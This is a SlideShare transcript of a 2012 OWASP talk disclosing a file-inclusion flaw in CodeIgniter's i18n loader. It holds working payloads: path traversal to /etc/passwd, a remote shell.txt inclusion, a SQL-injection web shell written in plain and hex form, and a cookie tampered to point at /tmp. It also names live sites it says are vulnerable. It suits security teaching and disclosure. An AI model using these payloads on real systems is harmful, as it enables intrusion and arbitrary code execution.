CodeIgniter i18n Security Flaw

2,658 views
2,468 views

Published on

This demonstrates a LFI (local file inclusion) security flaw in internationalization feature of CodeIgniter, the famous PHP framework.
This was coined by me, and used to exploit numerous CodeIgniter powered websites. Currently reported and fixed.

Published in: Technology
0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
2,658
On SlideShare
0
From Embeds
0
Number of Embeds
22
Actions
Shares
0
Downloads
36
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide

CodeIgniter i18n Security Flaw

  1. 1. 20 May 2012 CodeIgniter i18n Code InjectionAbbas Naderi (aka AbiusX)OWASP Chapter Leader of IranISSECO Memberabbas.naderi@owasp.org / me@abiusx.com
  2. 2. Understand the Context
  3. 3. PHP• Mostly used SSI (75%)• 17 Years Maturity• Open Source Nature• Rapid Develop/Deploy• Secure Core• Insecure Libraries• Low Level Web Development *
  4. 4. PHP Frameworks• PHP low level web support• Incorporation of Frameworks• Much Used and Mature -> Secure• Huge Codebase -> Insecure• Developers, not Security guys• Security-Oriented Frameworks (OWASP ESAPI)
  5. 5. CodeIgniter• Most used Mid-level Framework
  6. 6. Internationalization• i18n importance today• Difficult implementation: – File-based (Wordpress, eFront, …) – Database (jFramework) – Code-based (CodeIgniter, …)• Obsolete consumers -> No testing
  7. 7. Remote File Inclusion
  8. 8. RFI at a glance• 3rd Most Common Vuln. in Top Ten 2007 : Malicious File Inclusion• Not in Top Ten 2010 : Mostly Understood and Fixed• Highest Impact (Run Arbitrary Code!)• Common on Interpreted Languages• Most Common in PHP (Why?)
  9. 9. RFI Example<?php$page = $_GET[„page‟];include “./pages/{$page}.php”;Malicious Input:Mysite.com?page=../../../etc/passwd%00Where current dir is /var/wwwinclude “/var/www/pages/../../../etc/passwd”;= include “/etc/passwd”; //show it on screen
  10. 10. RFI CheatsheetUse null character on input to terminate string:include “./{$page}.you.cant.rfi.me.php”;Use absolute paths if input initiates include:include “{$_GET[‘page’]}”;page=http://abx.ir/shell.txt%00
  11. 11. allow_url_include
  12. 12. Filter Parameters• CodeIgniter has the least found exploits on all major PHP frameworks (Commercial Codebase)• CodeIgniter filters dangerous characters such as ‘ , “, /, ?, <, > on GET parameters, to prevent most XSS and Injection attacks.• CodeIgniter has central module loader, and MVC pattern, preventing most RFIs.
  13. 13. Internationalization
  14. 14. Internationalization (II)
  15. 15. Local File Inclusion• Useful to extract info. from target system – /etc/passwd – ./config/database.php• Easy to exploit
  16. 16. Local Code Inclusion• Requires a blind injection: – „” and 1=0 union select “<?php echo shell_exec($_REQUEST[q]); into outfile “/tmp/sales_lang.php” -- – CodeIgniter filters <? From input – „ and 1=0 union select unhex(“3c3f706870206563686f207368656c6c5f6578656328245f 524551554553545b715d29″) into outfile “/tmp/common_lang.php” -- – Caution: into outfile does not overwrite! – Where to find blind injection?
  17. 17. Local Code Inclusion (II)• Now change cookie from – a%3A8%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22aa55f87c8b18 afe75b3cd7baba330553%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A% 22178.162.154.251%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22M ozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10.7%3B+rv%3A12%22%3Bs%3 A13%3A%22last_activity%22%3Bs%3A10%3A%221337541932%22%3Bs%3A3%3A %22lan%22%3Bs%3A1%3A%221%22%3Bs%3A3%3A%22dir%22%3Bs%3A3%3A% 22rtl%22%3Bs%3A4%3A%22lang%22%3Bs%3A2%3A%22fa%22%3Bs%3A3%3A% 22alg%22%3Bs%3A5%3A%22right%22%3B%7Db3c9bed5e9656eca61938c9bc6965b ad – To lang%22%3Bs%3A2%3A%22../../../../../tmp
  18. 18. Remote Code Inclusion• Look at the code: include($package_path.language/.$idiom./.$langfile);• You a hacker? tell me how!
  19. 19. Remote Code Inclusion (II)$this->load->add_package_path()Adding a package path instructs the Loader class toprepend a given path for subsequent requests forresources. As an example, the "Foo Bar" applicationpackage above has a library named Foo_bar.php. Inour controller, wed do the following:$this->load->add_package_path(APPPATH.third_party/foo_bar/);http://codeigniter.com/user_guide/libraries/loader.html
  20. 20. Demonstration
  21. 21. CodeIgniter + i18n• More than 240 sites discovered: – http://www.sedoparking.com – http://bambooinvoice.org/ – http://www.haughin.com/ – http://www.rapyd.com/ – http://code-igniter.ru/• And tons more…
  22. 22. Questions? Feedback?Abbas Naderi (aka AbiusX)OWASP Chapter Leader of IranISSECO Memberabiusx@acm.org / me@abiusx.com

×